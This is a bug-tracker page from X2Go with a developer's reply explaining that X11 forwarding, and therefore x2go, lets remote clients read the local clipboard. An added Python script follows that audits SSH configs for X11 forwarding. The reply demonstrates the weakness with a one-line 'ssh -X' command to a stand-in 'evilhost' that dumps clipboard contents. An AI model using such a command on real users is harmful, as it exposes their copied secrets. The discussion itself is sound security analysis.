X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security


Subject: Bug#258: [X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Date: Mon, 1 Jul 2013 16:01:32 +0200
From: Alexander Wuerstlein <snalwuer@cip.informatik.uni-erlangen.de>
To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
On 13-07-01 15:03, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
> On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> > Yes, other related tools like X11. x2go is basically just a faster
> > version of the traditional xforwarding. In X11 every client can always
> > access the clipboard/selection/etc., so you will also have the same
> > security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> > demonstrates this.
> Well but that "argument" doesn't really count:
> 1) Just because others do it plainly insecure, you cannot do it like
> this as well... like as if Gentoo would say "if Debian breaks their
> OpenSSL entropy, we should do so, too"... o.O

It isn't like that at all, X11 clients and servers have to comply with
the respective parts of the protocol. If the protocol demands insecure
behaviour, it's a design bug, or maybe, like in this case, a compromise
nobody likes: Since in X11 clients handle all the shortcuts and mouse
button events, since clients or toolkits handle the widgets, the only
option to implement C&P is to have clients ask the server for the
clipboard or selection contents. It's more a "there is no other way to do
it except to make it unusable" kind of problem imho.

> 2) Literally no one who has a decent mind of security, will allow other
> hosts to directly access their X server.. because then you're (security
> wise) anyway screwed...

I'm not only talking about 'xhost +' and the like, this would of course
be a major problem for more reasons than only the clipboard. And if you
wouldn't trust a host with 'ssh -X', then you also shouldn't trust it
with x2go. Just think of x2go as a variant of 'ssh -X' with image
compression and some extras. X11 protocol firewalling is not really one
of those extras. And since the x2goclient will always run in your local
X session, it will always be able to read your clipboard.

> And I thought NX would secure what's sent from remote in order to not
> being able to overtake the input/output devices of the hosts (whole)
> Xserver).

In a way, yes. Afaik you can avoid certain attacks of the "I'll attach
to the root window and get all key events" kind since windowed x2go
sessions give you a separate root window. But I imagine there are more
problems out there nobody thought of yet.



Ciao,

Alexander Wuerstlein.
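
The message above equates trusting a host with x2go to trusting it with 'ssh -X', so a useful check is which hosts a client's OpenSSH configuration already grants X11 forwarding to. The following is an added example, not part of the original message or of X2Go: a small Python audit that resolves the effective ForwardX11 / ForwardX11Trusted values for a hostname. The sample configuration, hostnames and function names are constructed, and Match blocks are ignored.

```python
import fnmatch

# Constructed sample client configuration (not taken from the bug report).
SAMPLE_CONFIG = """\
Host build.example.org
    ForwardX11 no
Host *.example.org
    ForwardX11 yes
    ForwardX11Trusted yes
Host *
    ForwardX11=yes
"""

def parse_blocks(text):
    """Return [(host_patterns, {keyword: value})] in file order."""
    blocks = [(["*"], {})]  # options before the first Host line apply to every host
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        words = line.replace("=", " ", 1).split()  # accept "Key value" and "Key=value"
        key, args = words[0].lower(), words[1:]
        if key in ("host", "match"):
            # Match blocks get an empty pattern list, so their options are skipped.
            blocks.append((args if key == "host" else [], {}))
        elif args:
            blocks[-1][1].setdefault(key, args[0].lower())
    return blocks

def host_matches(hostname, patterns):
    """Host line semantics: a matching negated pattern vetoes, else any match wins."""
    positive = False
    for p in patterns:
        if p.startswith("!"):
            if fnmatch.fnmatchcase(hostname, p[1:]):
                return False
        elif fnmatch.fnmatchcase(hostname, p):
            positive = True
    return positive

def x11_exposure(text, hostname):
    """Return 'none', 'untrusted' or 'trusted' X11 forwarding for hostname."""
    effective = {}
    for patterns, opts in parse_blocks(text):
        if host_matches(hostname, patterns):
            effective = {**opts, **effective}  # first obtained value wins
    # Assumes upstream OpenSSH defaults ("no" for both); a distribution may differ.
    if effective.get("forwardx11", "no") != "yes":
        return "none"
    return "trusted" if effective.get("forwardx11trusted", "no") == "yes" else "untrusted"
```

Because ssh reads the user configuration before the system-wide one and keeps the first value it obtains, pass the two files concatenated in that order to audit a real client.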



X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Nov 21 14:54:58 2024; Machine Name: ymir.das-netzwerkteam.de
